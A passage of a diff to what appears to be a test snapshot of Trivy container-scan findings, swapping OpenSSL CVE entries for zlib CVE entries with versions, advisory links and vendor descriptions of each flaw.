"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0009/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://savannah.gnu.org/bugs/?62387", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-1", + "value": "https://savannah.gnu.org/patch/?10307", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-2", + "value": "https://ubuntu.com/security/notices/USN-5900-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0215", + "value": "https://ubuntu.com/security/notices/USN-5900-2", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-48303", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0286", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "1:1.2.11.dfsg-1+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-37434", + "installedVersion": "1:1.2.11.dfsg-1", + "packageName": "zlib1g", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2023-0286", - "https://access.redhat.com/security/cve/cve-2023-0286", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", - "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", - "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", - "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", - "https://linux.oracle.com/cve/CVE-2023-0286.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", - "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://ubuntu.com/security/notices/USN-5845-1", - "https://ubuntu.com/security/notices/USN-5845-2", - "https://www.cve.org/CVERecord?id=CVE-2023-0286", - "https://www.openssl.org/news/secadv/20230207.txt", + "http://seclists.org/fulldisclosure/2022/Oct/37", + "http://seclists.org/fulldisclosure/2022/Oct/38", + "http://seclists.org/fulldisclosure/2022/Oct/41", + "http://seclists.org/fulldisclosure/2022/Oct/42", + "http://www.openwall.com/lists/oss-security/2022/08/05/2", + "http://www.openwall.com/lists/oss-security/2022/08/09/1", + "https://access.redhat.com/errata/RHSA-2022:8291", + "https://access.redhat.com/security/cve/CVE-2022-37434", + "https://bugzilla.redhat.com/2116639", + "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", + "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", + "https://errata.almalinux.org/9/ALSA-2022-8291.html", + "https://errata.rockylinux.org/RLSA-2022:8291", + "https://github.com/curl/curl/issues/9271", + "https://github.com/ivd38/zlib_overflow", + "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", + "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", + "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", + "https://linux.oracle.com/cve/CVE-2022-37434.html", + "https://linux.oracle.com/errata/ELSA-2023-1095.html", + "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", + "https://security.netapp.com/advisory/ntap-20220901-0005/", + "https://security.netapp.com/advisory/ntap-20230427-0007/", + "https://support.apple.com/kb/HT213488", + "https://support.apple.com/kb/HT213489", + "https://support.apple.com/kb/HT213490", + "https://support.apple.com/kb/HT213491", + "https://support.apple.com/kb/HT213493", + "https://support.apple.com/kb/HT213494", + "https://ubuntu.com/security/notices/USN-5570-1", + "https://ubuntu.com/security/notices/USN-5570-2", + "https://ubuntu.com/security/notices/USN-5573-1", + "https://www.cve.org/CVERecord?id=CVE-2022-37434", + "https://www.debian.org/security/2022/dsa-5218", ], }, "category": "Vulnerability", - "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", + "description": "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "X.400 address type confusion in X.509 GeneralName", + "name": "heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0286", + "value": "https://avd.aquasec.com/nvd/cve-2022-37434", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", + "value": "http://seclists.org/fulldisclosure/2022/Oct/37", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0286", + "value": "http://seclists.org/fulldisclosure/2022/Oct/38", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2023-0286", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "http://seclists.org/fulldisclosure/2022/Oct/42", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "http://www.openwall.com/lists/oss-security/2022/08/05/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "http://www.openwall.com/lists/oss-security/2022/08/09/1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://access.redhat.com/errata/RHSA-2022:8291", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://access.redhat.com/security/cve/CVE-2022-37434", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://bugzilla.redhat.com/2116639", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://errata.almalinux.org/9/ALSA-2022-8291.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://errata.rockylinux.org/RLSA-2022:8291", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://github.com/curl/curl/issues/9271", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://github.com/ivd38/zlib_overflow", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://linux.oracle.com/cve/CVE-2022-37434.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://linux.oracle.com/errata/ELSA-2023-1095.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://security.netapp.com/advisory/ntap-20220901-0005/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://support.apple.com/kb/HT213488", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://support.apple.com/kb/HT213489", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://support.apple.com/kb/HT213490", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://support.apple.com/kb/HT213491", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://support.apple.com/kb/HT213493", }, { "type": "URL", - "value": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", + "value": "https://support.apple.com/kb/HT213494", }, { "type": "URL", - "value": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", + "value": "https://ubuntu.com/security/notices/USN-5570-1", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", + "value": "https://ubuntu.com/security/notices/USN-5570-2", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", + "value": "https://ubuntu.com/security/notices/USN-5573-1", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-37434", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", + "value": "https://www.debian.org/security/2022/dsa-5218", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1:1.2.11.dfsg-1+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-25032", + "installedVersion": "1:1.2.11.dfsg-1", + "packageName": "zlib1g", + "references": [ + "http://seclists.org/fulldisclosure/2022/May/33", + "http://seclists.org/fulldisclosure/2022/May/35", + "http://seclists.org/fulldisclosure/2022/May/38", + "http://www.openwall.com/lists/oss-security/2022/03/25/2", + "http://www.openwall.com/lists/oss-security/2022/03/26/1", + "https://access.redhat.com/errata/RHSA-2022:8420", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", + "https://access.redhat.com/security/cve/CVE-2018-25032", + "https://bugzilla.redhat.com/2067945", + "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", + "https://errata.almalinux.org/9/ALSA-2022-8420.html", + "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", + "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", + "https://github.com/madler/zlib/issues/605", + "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", + "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", + "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", + "https://linux.oracle.com/cve/CVE-2018-25032.html", + "https://linux.oracle.com/errata/ELSA-2022-9565.html", + "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", + "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", + "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", + "https://security.gentoo.org/glsa/202210-42", + "https://security.netapp.com/advisory/ntap-20220526-0009/", + "https://security.netapp.com/advisory/ntap-20220729-0004/", + "https://support.apple.com/kb/HT213255", + "https://support.apple.com/kb/HT213256", + "https://support.apple.com/kb/HT213257", + "https://ubuntu.com/security/notices/USN-5355-1", + "https://ubuntu.com/security/notices/USN-5355-2", + "https://ubuntu.com/security/notices/USN-5359-1", + "https://ubuntu.com/security/notices/USN-5359-2", + "https://ubuntu.com/security/notices/USN-5739-1", + "https://www.cve.org/CVERecord?id=CVE-2018-25032", + "https://www.debian.org/security/2022/dsa-5111", + "https://www.openwall.com/lists/oss-security/2022/03/24/1", + "https://www.openwall.com/lists/oss-security/2022/03/28/1", + "https://www.openwall.com/lists/oss-security/2022/03/28/3", + "https://www.oracle.com/security-alerts/cpujul2022.html", + ], + }, + "category": "Vulnerability", + "description": "zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "A flaw found in zlib when compressing (not decompressing) certain inputs", + "references": [ { "type": "URL", - "value": "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", + "value": "https://avd.aquasec.com/nvd/cve-2018-25032", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0286.html", + "value": "http://seclists.org/fulldisclosure/2022/May/33", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "http://seclists.org/fulldisclosure/2022/May/35", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", + "value": "http://seclists.org/fulldisclosure/2022/May/38", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + "value": "http://www.openwall.com/lists/oss-security/2022/03/25/2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "http://www.openwall.com/lists/oss-security/2022/03/26/1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-1", + "value": "https://access.redhat.com/errata/RHSA-2022:8420", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-2", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0286", + "value": "https://access.redhat.com/security/cve/CVE-2018-25032", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", - }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0464", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0464", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0464", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230322.txt", - ], - }, - "category": "Vulnerability", - "description": "A security vulnerability has been identified in all supported versions - -of OpenSSL related to the verification of X.509 certificate chains -that include policy constraints. Attackers may be able to exploit this -vulnerability by creating a malicious certificate chain that triggers -exponential use of computational resources, leading to a denial-of-service -(DoS) attack on affected systems. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", - "references": [ + "value": "https://bugzilla.redhat.com/2067945", + }, { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0464", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0464", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "value": "https://errata.almalinux.org/9/ALSA-2022-8420.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "value": "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "value": "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "value": "https://github.com/madler/zlib/issues/605", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "value": "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "value": "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://linux.oracle.com/cve/CVE-2018-25032.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "value": "https://linux.oracle.com/errata/ELSA-2022-9565.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230322.txt", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-2650", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", - "references": [ - "http://www.openwall.com/lists/oss-security/2023/05/30/1", - "https://access.redhat.com/security/cve/CVE-2023-2650", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", - "https://ubuntu.com/security/notices/USN-6119-1", - "https://www.cve.org/CVERecord?id=CVE-2023-2650", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230530.txt", - ], - }, - "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or -data containing them may be very slow. - -Impact summary: Applications that use OBJ_obj2txt() directly, or use any of -the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message -size limit may experience notable to very long delays when processing those -messages, which may lead to a Denial of Service. - -An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - -most of which have no size limit. OBJ_obj2txt() may be used to translate -an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL -type ASN1_OBJECT) to its canonical numeric text form, which are the -sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by -periods. - -When one of the sub-identifiers in the OBJECT IDENTIFIER is very large -(these are sizes that are seen as absurdly large, taking up tens or hundreds -of KiBs), the translation to a decimal number in text may take a very long -time. The time complexity is O(n^2) with 'n' being the size of the -sub-identifiers in bytes (*). - -With OpenSSL 3.0, support to fetch cryptographic algorithms using names / -identifiers in string form was introduced. This includes using OBJECT -IDENTIFIERs in canonical numeric text form as identifiers for fetching -algorithms. - -Such OBJECT IDENTIFIERs may be received through the ASN.1 structure -AlgorithmIdentifier, which is commonly used in multiple protocols to specify -what cryptographic algorithm should be used to sign or verify, encrypt or -decrypt, or digest passed data. - -Applications that call OBJ_obj2txt() directly with untrusted data are -affected, with any version of OpenSSL. If the use is for the mere purpose -of display, the severity is considered low. - -In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, -CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 -certificates, including simple things like verifying its signature. - -The impact on TLS is relatively low, because all versions of OpenSSL have a -100KiB limit on the peer's certificate chain. Additionally, this only -impacts clients, or servers that have explicitly enabled client -authentication. - -In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, -such as X.509 certificates. This is assumed to not happen in such a way -that it would cause a Denial of Service, so these versions are considered 